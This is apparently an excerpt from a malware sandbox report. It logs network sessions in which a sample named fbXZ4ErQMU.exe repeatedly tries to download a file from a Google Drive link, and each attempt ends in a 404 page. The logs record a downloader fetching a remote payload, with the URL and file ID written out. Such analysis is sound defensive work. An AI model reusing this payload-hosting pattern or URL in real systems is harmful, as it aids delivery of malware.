                                                        2024-12-05 16:07:41 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 64 43 33 72 4c 5a 72 68 6f 67 6d 53 79 6d 52 62 47 75 33 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EdC3rLZrhogmSymRbGu3aQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.11.2049803142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:52 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:52 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:52 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-KvCtK7n4Cf36-TCc4JMESQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.11.2049804142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:07:52 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:53 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:53 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-oyygR_8YGS3eMcbclErYPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6BQ1MhfXNBXfjOMJ5-AmjyT-KdBA-yMqsHQvIZLloZoeP6acx7CBlLRs_GCannUzI-3RqF1DL_eg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 55 6e 66 64 50 49 2d 73 5f 69 52 6d 38 30 37 48 48 63 53 6a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IUnfdPI-s_iRm807HHcSjg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.11.2049805142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:03 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:03 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:03 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-ufNahMsQZMQUBv9godE0iQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.11.2049806142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:03 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:04 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:04 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-MAt3ZcCFW0m5SGrwzXM6ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7DRkY3tc8BWnqaPrzNJivplHHwe1Nq0lMHjG0FEHZZKH-BxrcQ8iP61oYnW1ELiPh-U35AZCH5NA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 5f 62 4c 62 6f 33 75 49 6d 6c 35 4b 4d 37 68 37 45 55 34 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5_bLbo3uIml5KM7h7EU48g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.11.2049807142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:14 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:14 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:14 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-tccQIFdPNirGnZUTgAPo9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.11.2049808142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:15 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:15 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:15 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-9vvGfA2HO0cqhM8DgDGgxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC662w_ozE6mpmBiQ0HZWLBYeBDxKsze3quUGohjbo3MMdfr9FMxgm_gxcn_H5H4_jqkgHPadg2x0g
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 50 42 2d 4c 64 42 5a 51 35 4e 34 63 62 78 58 31 38 57 68 37 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6PB-LdBZQ5N4cbxX18Wh7Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.11.2049809142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:25 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:26 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:25 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-pRCgEhwviAKTKxpjgTcnXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.11.2049810142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:26 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:26 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:26 GMT
                                                        Content-Security-Policy: script-src 'nonce-7-03QxQb97E_Ufe9rc4Bng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
